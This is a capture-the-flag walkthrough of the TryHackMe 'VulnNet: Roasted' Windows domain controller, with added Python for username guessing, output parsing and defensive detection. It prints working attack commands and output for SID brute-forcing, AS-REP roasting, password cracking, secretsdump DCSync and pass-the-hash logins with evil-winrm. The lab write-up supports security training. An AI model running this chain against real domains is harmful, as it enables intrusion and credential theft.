- URL: https://tryhackme.com/room/vulnnetroasted
- Target OS: Windows
- Rated Difficulty: Easy
DESCRIPTION
VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing.
ENUM >> NMAP
# Nmap 7.92 scan initiated Sun Feb 13 12:01:45 2022 as: nmap -sS -A -p 53,88,135,139,389,445,464,593,636,3268,3269 -oN nmap_agressive 10.10.31.100
Nmap scan report for 10.10.31.100
Host is up (0.39s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-13 01:02:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 59s
| smb2-time:
| date: 2022-02-13T01:03:28
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 407.94 ms 10.9.0.1
2 408.00 ms 10.10.31.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 13 12:03:16 2022 -- 1 IP address (1 host up) scanned in 91.77 seconds
No web server… just a plain server with default ports… SMB! 😉
ENUM >> SMB shares
- First, let's see what shares (if any) we can get to. I included a username but left the password blank, as not supplying any username at all would cause a failure due to lack of access.
❯ smbmap -u stimpz -H 10.10.31.100
[+] Guest session IP: 10.10.31.100:445 Name: vulnnet-rst.local0
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
- Looks like we have access to two non-default shares, VulnNet-Business-Anonymous and VulnNet-Enterprise-Anonymous. Both shares have 3 text files each:
VulnNet-Business-Anonymous:
❯ smbclient \\\\10.10.31.100\\VulnNet-Business-Anonymous
Enter WORKGROUP\stimpz's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Mar 13 13:46:40 2021
.. D 0 Sat Mar 13 13:46:40 2021
Business-Manager.txt A 758 Fri Mar 12 12:24:34 2021
Business-Sections.txt A 654 Fri Mar 12 12:24:34 2021
Business-Tracking.txt A 471 Fri Mar 12 12:24:34 2021
8771839 blocks of size 4096. 4526264 blocks available
VulnNet-Enterprise-Anonymous:
❯ smbclient \\\\10.10.31.100\\VulnNet-Enterprise-Anonymous
Enter WORKGROUP\stimpz's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Mar 13 13:46:40 2021
.. D 0 Sat Mar 13 13:46:40 2021
Enterprise-Operations.txt A 467 Fri Mar 12 12:24:34 2021
Enterprise-Safety.txt A 503 Fri Mar 12 12:24:34 2021
Enterprise-Sync.txt A 496 Fri Mar 12 12:24:34 2021
8771839 blocks of size 4096. 4522008 blocks available
- Out of the 6 text files, 4 of them had a unique full name mentioned. I ended up dumping their full names into a text file:
Alexa Whitehat
Jack Goldenhand
Tony Skid
Johnny Leet
- Then, I ran a custom ruleset with John The Ripper that created a userlist from the list of full names, and I also added two known default account names, Administrator and krbtgt, to the top of the file. I strongly suggest checking out Dzmitry Savitski's blog post for details on how to set up his ruleset; it worked flawlessly and was actually one of the only few that generated the right pattern for this system's naming convention.
- Finally, I ran Kerbrute against the list and got the following response:
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/13/22 - Ronnie Flathers @ropnop
2022/02/13 13:51:29 > Using KDC(s):
2022/02/13 13:51:29 > vulnnet-rst.local:88
2022/02/13 13:51:29 > [+] VALID USERNAME: administrator@vulnnet-rst.local
2022/02/13 13:51:31 > [+] VALID USERNAME: j-goldenhand@vulnnet-rst.local
2022/02/13 13:51:31 > [+] VALID USERNAME: a-whitehat@vulnnet-rst.local
2022/02/13 13:51:31 > [+] VALID USERNAME: t-skid@vulnnet-rst.local
2022/02/13 13:51:31 > [+] VALID USERNAME: j-leet@vulnnet-rst.local
2022/02/13 13:51:33 > Done! Tested 106 usernames (5 valid) in 4.483 seconds
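The following is an added example, not code from the original writeup or from the John ruleset it references. It builds the same kind of candidate list in plain Python from the four full names recovered from the shares, putting the convention that the Kerbrute results confirmed for this domain (first initial, hyphen, surname) first and a handful of other common corporate conventions after it, so it generalises beyond this one target. The point for a defender is how little guessing a predictable naming convention leaves an attacker once a few employee names are public.

```python
# Added example (not from the original writeup): candidate usernames from full names.
# The names below are the four recovered from the share text files.
FULL_NAMES = [
    "Alexa Whitehat",
    "Jack Goldenhand",
    "Tony Skid",
    "Johnny Leet",
]

# Well-known accounts that exist in every AD domain; the writeup put these at the top.
DEFAULT_ACCOUNTS = ["Administrator", "krbtgt"]


def candidates_for(full_name):
    """Return username candidates for one 'First Last' name, most likely first.

    The convention observed on this domain (a-whitehat) comes first; the rest are
    other common conventions, so the list is useful against any naming scheme.
    """
    parts = full_name.strip().lower().split()
    if not parts:
        return []
    if len(parts) == 1:
        return parts
    first, last = parts[0], parts[-1]
    initial = first[0]
    patterns = [
        f"{initial}-{last}",    # a-whitehat   (convention confirmed on this domain)
        f"{initial}.{last}",    # a.whitehat
        f"{initial}{last}",     # awhitehat
        f"{first}.{last}",      # alexa.whitehat
        f"{first}-{last}",      # alexa-whitehat
        f"{first}{last}",       # alexawhitehat
        f"{last}{initial}",     # whitehata
        first,                  # alexa
    ]
    seen = set()
    return [p for p in patterns if not (p in seen or seen.add(p))]


def build_userlist(full_names, defaults=DEFAULT_ACCOUNTS):
    """Default accounts first, then every candidate for every name, without duplicates."""
    userlist = list(defaults)
    for name in full_names:
        for candidate in candidates_for(name):
            if candidate not in userlist:
                userlist.append(candidate)
    return userlist


if __name__ == "__main__":
    # One name per line, the shape Kerbrute's userenum reads.
    print("\n".join(build_userlist(FULL_NAMES)))
```

Run stand-alone it prints the list; the first-initial-hyphen-surname entries are the ones that matched the valid usernames Kerbrute reported above.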
- However, as you will see below, there is a MUCH easier way than going through all of that, and it is the one we will use from here on.
ENUM >> Users to scan against…
- Impacket has a wonderful tool named lookupsid.py that can be used to rip users and groups. It rips the list directly via SID bruteforcing. Ironically, I tried to do the same via crackmapexec and even enum4linux, but neither worked:
❯ lookupsid.py anonymous@10.10.158.170 | tee vulnnet_users.txt
Password:
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.158.170
[*] StringBinding ncacn_np:10.10.158.170[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
- Then to grab only the users and drop them in a list, we can use the following command:
❯ grep SidTypeUser vulnnet_users.txt | awk '{print $2}' | cut -d "\\" -f2 > users.txt
- This leaves us with the following userlist:
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet
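As an added example (not part of the original writeup or of Impacket), here is a small parser for the lookupsid.py output format shown above. The grep/awk/cut pipeline works for the SidTypeUser lines because user names contain no spaces, but it would mangle group and alias names such as "RAS and IAS Servers"; the regex below handles those, keeps the RID and object type, and separates the accounts created after domain promotion (RID 1000 and up), which is the part of this output a reviewer cares about when assessing what an anonymous caller can learn over the lsarpc pipe. The sample text is a constructed, shortened copy of the output above.

```python
import re

# Constructed excerpt in the format lookupsid.py prints (shortened from the output above).
SAMPLE_LOOKUPSID = """\
[*] Brute forcing SIDs at 10.10.158.170
[*] StringBinding ncacn_np:10.10.158.170[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\\Administrator (SidTypeUser)
501: VULNNET-RST\\Guest (SidTypeUser)
502: VULNNET-RST\\krbtgt (SidTypeUser)
512: VULNNET-RST\\Domain Admins (SidTypeGroup)
553: VULNNET-RST\\RAS and IAS Servers (SidTypeAlias)
1000: VULNNET-RST\\WIN-2BO8M1OE1M1$ (SidTypeUser)
1104: VULNNET-RST\\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\\a-whitehat (SidTypeUser)
1109: VULNNET-RST\\t-skid (SidTypeUser)
"""

SID_RE = re.compile(r"Domain SID is:\s+(S-1-5-21-\d+-\d+-\d+)")
# "RID: DOMAIN\name (SidTypeXxx)"; the name may contain spaces, which is what
# breaks awk '{print $2}' for groups and aliases.
ENTRY_RE = re.compile(
    r"^(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<type>SidType\w+)\)\s*$"
)


def parse_lookupsid(text):
    """Return (domain_sid, entries); each entry is a dict with rid/domain/name/type."""
    domain_sid = None
    entries = []
    for line in text.splitlines():
        m = SID_RE.search(line)
        if m:
            domain_sid = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append({
                "rid": int(m.group("rid")),
                "domain": m.group("domain"),
                "name": m.group("name"),
                "type": m.group("type"),
            })
    return domain_sid, entries


def user_accounts(entries, include_machines=False):
    """Names of SidTypeUser entries. Machine accounts (trailing $) are dropped by
    default: their passwords are machine-generated, so they are noise in a userlist."""
    users = [e["name"] for e in entries if e["type"] == "SidTypeUser"]
    if not include_machines:
        users = [u for u in users if not u.endswith("$")]
    return users


def custom_accounts(entries, min_rid=1000):
    """Objects created after domain promotion (RID >= 1000), i.e. the site-specific
    accounts and groups that an anonymous SID walk reveals."""
    return [e for e in entries if e["rid"] >= min_rid]


if __name__ == "__main__":
    sid, entries = parse_lookupsid(SAMPLE_LOOKUPSID)
    print("Domain SID:", sid)
    print("\n".join(user_accounts(entries)))
```

The fact that this works with the literal username "anonymous" and an empty password is the finding a defender should take from this step: the domain controller allows anonymous LSARPC SID lookups, which the RestrictAnonymous / RestrictAnonymousSAM policy settings are meant to close.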
ENUM >> Impacket’s GetNPUsers.py
- Let's throw our newly generated userlist at GetNPUsers.py and see what we get:
❯ GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.158.170 -no-pass -usersfile users.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
<REDACTED>
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
CREDS - t-skid's AS-REP hash
LOOT >> Cracking t-skid's AS-REP hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt t-skid_as-rep.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)
1g 0:00:00:04 DONE (2022-02-13 14:56) 0.2358g/s 749645p/s 749645c/s 749645C/s tjalling..tj0216044
Use the "--show" option to display all of the cracked passwords reliably
Session completed
CREDS - t-skid
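Added example covering both the GetNPUsers.py step and the John step above; it is not code from the writeup, Impacket or John. The first part is the check a defender would run: GetNPUsers.py reports on the DONT_REQUIRE_PREAUTH bit (0x400000) of userAccountControl, so the same audit can be done from a directory export or with an LDAP bit-match filter, and the KDC_ERR_CLIENT_REVOKED line in the output is what the KDC returns for a disabled account such as krbtgt. The second part splits John's krb5asrep line for the RC4 (etype 23) case the writeup cracked into its fields, which is useful when triaging such a hash from a log or ticket. The account records and the hash line are constructed with assumed values, not data from the box.

```python
import re

# userAccountControl flags (the UF_* constants from lmaccess.h / ADS_USER_FLAG).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000  # 4194304 decimal; the bit GetNPUsers.py reports on

# Constructed (sAMAccountName, userAccountControl) records chosen to mirror the
# GetNPUsers.py output above; these are assumptions, not values read from the target.
SAMPLE_ACCOUNTS = [
    ("Administrator", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD),
    ("Guest", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_ACCOUNTDISABLE),
    # krbtgt is disabled by default, which is why the KDC answers KDC_ERR_CLIENT_REVOKED
    ("krbtgt", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE),
    ("t-skid", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    ("a-whitehat", UF_NORMAL_ACCOUNT),
]


def asrep_roastable(accounts):
    """Enabled accounts whose userAccountControl has DONT_REQUIRE_PREAUTH set.

    For these the KDC hands an AS-REP, and with it offline-crackable material,
    to anyone who merely knows the username.
    """
    return [
        name for name, uac in accounts
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE
    ]


def ldap_filter_preauth_disabled():
    """The same audit as an LDAP filter. 1.2.840.113556.1.4.803 is
    LDAP_MATCHING_RULE_BIT_AND, so the clause is true when the bit is set."""
    return (
        "(&(objectCategory=person)(objectClass=user)"
        f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))"
    )


# John's krb5asrep line for etype 23 (the form shown in the writeup):
#   $krb5asrep$23$user@REALM:<16-byte checksum hex>$<encrypted enc-part hex>
ASREP23_RE = re.compile(
    r"^\$krb5asrep\$23\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_asrep23(line):
    """Split a krb5asrep etype-23 line into its fields, or raise ValueError."""
    m = ASREP23_RE.match(line.strip())
    if not m:
        raise ValueError("not an etype-23 krb5asrep line")
    return {
        "etype": 23,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "checksum_bytes": len(m.group("checksum")) // 2,
        "edata_bytes": len(m.group("edata")) // 2,
    }


# Constructed line with the same shape as the writeup's hash but dummy hex content.
SAMPLE_ASREP = "$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:" + "ab" * 16 + "$" + "cd" * 40

if __name__ == "__main__":
    print("AS-REP roastable:", asrep_roastable(SAMPLE_ACCOUNTS))
    print("LDAP filter:", ldap_filter_preauth_disabled())
    print(parse_asrep23(SAMPLE_ASREP))
```

The remediation the audit points at is simply clearing the "Do not require Kerberos preauthentication" option on any account that has it, and making sure such accounts do not carry passwords that rockyou.txt reaches in four seconds.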
ENUM >> More SMB… with a user this time!
- Using t-skid's credentials we get a few more readable shares: NETLOGON and SYSVOL:
✖ smbmap -u t-skid -p <REDACTED> -H 10.10.158.170
[+] IP: 10.10.158.170:445 Name: vulnnet-rst.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
- If we do a recursive scan on the NETLOGON share we see a file titled ResetPassword.vbs:
❯ smbmap -u t-skid -p <REDACTED> -H 10.10.158.170 -R 'NETLOGON'
[+] IP: 10.10.158.170:445 Name: vulnnet-rst.local
Disk Permissions Comment
---- ----------- -------
NETLOGON READ ONLY
.\NETLOGON\*
dr--r--r-- 0 Wed Mar 17 10:15:49 2021 .
dr--r--r-- 0 Wed Mar 17 10:15:49 2021 ..
fr--r--r-- 2821 Wed Mar 17 10:18:14 2021 ResetPassword.vbs
LOOT >> More creds from ResetPassword.vbs
- Inside ResetPassword.vbs we have 2 very interesting lines:
strUserNTName = "<REDACTED>"
strPassword = "<REDACTED>"
CREDS - a-whitehat
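The ResetPassword.vbs finding is a classic: a logon script in NETLOGON that carries a privileged account's password in clear text, readable by every authenticated user. As an added example (not the writeup's script and not the real file, whose contents were redacted), here is a scanner a defender can run over a copy of SYSVOL/NETLOGON to find the same pattern before an attacker does. The two script fragments are constructed with dummy account names and passwords; the rules cover the strPassword-style assignment seen here plus a few other common ways scripts embed secrets, and the findings mask the secret rather than copying it.

```python
import os
import re

# Constructed logon-script fragments (assumed shape; dummy credentials, not the box's).
SAMPLE_VBS = '''
' Reset a user's password via ADSI (assumed shape of the script found in NETLOGON)
strUserNTName = "a-whitehat"
strPassword = "ExampleP@ss123"
Set objUser = GetObject("WinNT://" & strDomain & "/" & strUserNTName & ",user")
objUser.SetPassword strPassword
'''

SAMPLE_PS1 = '''
$sec = ConvertTo-SecureString "Summer2021!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("svc_backup", $sec)
net use Z: \\\\fileserver\\share /user:CORP\\svc_backup Summer2021!
'''

# Each rule: a label and a pattern whose group 1 is the secret, so it can be masked.
CRED_RULES = [
    ("vbs/bat-assignment",
     re.compile(r'(?i)^\s*(?:set\s+)?(?:str|s)?(?:pass(?:word|wd)?|pwd)\s*=\s*"?([^"\s]+)')),
    ("setpassword-literal", re.compile(r'(?i)\.SetPassword\s+"([^"]+)"')),
    ("powershell-plaintext", re.compile(r'(?i)ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText')),
    ("net-use-password", re.compile(r"(?i)\bnet\s+use\b.*?/user:\S+\s+(\S+)")),
]

SCRIPT_EXTENSIONS = {".vbs", ".bat", ".cmd", ".ps1", ".js", ".kix"}


def find_hardcoded_credentials(text, source="<inline>"):
    """One finding per matching line: source, line number, rule, and the line with
    the secret replaced by <redacted> so reports do not spread the password further."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in CRED_RULES:
            m = pattern.search(line)
            if m:
                masked = line.replace(m.group(1), "<redacted>")
                findings.append({"source": source, "line": lineno,
                                 "rule": label, "text": masked.strip()})
                break  # one finding per line is enough
    return findings


def scan_tree(root):
    """Walk a mounted or copied SYSVOL/NETLOGON tree and scan every script in it."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if os.path.splitext(fn)[1].lower() in SCRIPT_EXTENSIONS:
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(find_hardcoded_credentials(fh.read(), path))
    return findings


if __name__ == "__main__":
    for f in find_hardcoded_credentials(SAMPLE_VBS, "ResetPassword.vbs") + \
             find_hardcoded_credentials(SAMPLE_PS1, "mapdrives.ps1"):
        print(f"{f['source']}:{f['line']} [{f['rule']}] {f['text']}")
```

Point scan_tree at a local copy of the share (for instance the directory smbclient's "recurse; mget *" produces) and it reports every script that would hand an attacker the same gift this one did; the fix is to move the password reset into a scheduled task or managed service account rather than a world-readable script.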
- Let’s see what smbmap comes back with when we try them:
❯ smbmap -u a-whitehat -p <REDACTED> -H 10.10.158.170
[+] IP: 10.10.158.170:445 Name: vulnnet-rst.local
[-] Work[!] Unable to remove test directory at \\10.10.158.170\SYSVOL\CSTFIGYZGM, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ, WRITE Logon server share
SYSVOL READ, WRITE Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
- Now we are definitely getting somewhere… R/W access on ADMIN$ means we have some serious privs now! 😉
PRIVESC >> a-whitehat has WinRM access!
❯ evil-winrm -i vulnnet-rst.local -u a-whitehat -p <REDACTED>
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\a-whitehat\Documents>
- Hooray! Shell access to a user that has elevated privileges! With this level of access we can hopefully run secretsdump against the DC. First thing's first though…
LOOT >> user.txt
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> ls
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> Get-ChildItem -Path C:\Users\ -Recurse -Include user.txt
Directory: C:\Users\enterprise-core-vn\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2021 3:43 PM 39 user.txt
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> cat C:\Users\enterprise-core-vn\Desktop\user.txt
<REDACTED>
FLAG - user.txt
ENUM >> secretsdump using a-whitehat’s credentials
- a-whitehat brings the goods! 😉
❯ secretsdump.py 'vulnnet-rst.local/a-whitehat:<REDACTED>@10.10.219.71'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
<REDACTED>
[*] Cleaning up...
CREDS - VulnNet - Roasted DC hash dump
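secretsdump.py says it is "Using the DRSUAPI method to get NTDS.DIT secrets": it asks the DC to replicate the directory to it the way a partner DC would, which is the technique commonly called DCSync. On the defender's side this leaves a Security event 4662 on the DC (when "Audit Directory Service Access" is on) whose Properties field lists the replication control-access-right GUIDs, and the signal is simply that the subject is not a domain controller's computer account. The following is an added example, not code from the writeup or Impacket: a small detector over constructed 4662 records flattened to dicts with the event's EventData field names; the DC name "DC02$" and the event contents are assumptions.

```python
import re

# Control-access-right GUIDs recorded in the Properties field of a 4662 event when
# a caller requests directory replication (the rights DCSync needs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed 4662 events as dicts keyed by EventData field names. The first is a
# partner DC's normal replication, the second mirrors a secretsdump.py run as in the
# writeup, the third is unrelated access to a user object by the same account.
REPL_PROPS = ("%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
              "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
              "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}")
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "VULNNET-RST",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": REPL_PROPS},
    {"EventID": 4662, "SubjectUserName": "a-whitehat", "SubjectDomainName": "VULNNET-RST",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": REPL_PROPS},
    {"EventID": 4662, "SubjectUserName": "a-whitehat", "SubjectDomainName": "VULNNET-RST",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
     "Properties": "%%7688\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def replication_rights_in(event):
    """Names of the replication control-access rights present in a 4662 event."""
    if event.get("EventID") != 4662:
        return []
    found = []
    for guid in GUID_RE.findall(event.get("Properties", "")):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name:
            found.append(name)
    return found


def detect_dcsync(events, domain_controller_accounts, allowlist=()):
    """Flag replication requests whose subject is neither a DC computer account nor an
    explicitly allowed synchronisation account (e.g. an Azure AD Connect MSOL_ account)."""
    expected = {a.lower() for a in domain_controller_accounts}
    expected |= {a.lower() for a in allowlist}
    alerts = []
    for ev in events:
        rights = replication_rights_in(ev)
        if not rights:
            continue
        if ev.get("SubjectUserName", "").lower() in expected:
            continue
        alerts.append({"subject": ev["SubjectUserName"],
                       "domain": ev.get("SubjectDomainName"),
                       "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, {"DC02$", "WIN-2BO8M1OE1M1$"}):
        print("DCSync-style replication by non-DC:", alert)
```

In a real deployment the DC account set comes from the Domain Controllers OU and the allowlist from the accounts you know hold replication rights on purpose; anything else requesting Get-Changes-All is worth an immediate look, because what follows is exactly the hash dump shown here.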
- Awesome! Now that we have the Administrator NTLM hash… can we use it to log in via WinRM?
❯ evil-winrm -i vulnnet-rst.local -u Administrator -H <REDACTED>
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vulnnet-rst\administrator
LOOT >> system.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat system.txt
<REDACTED>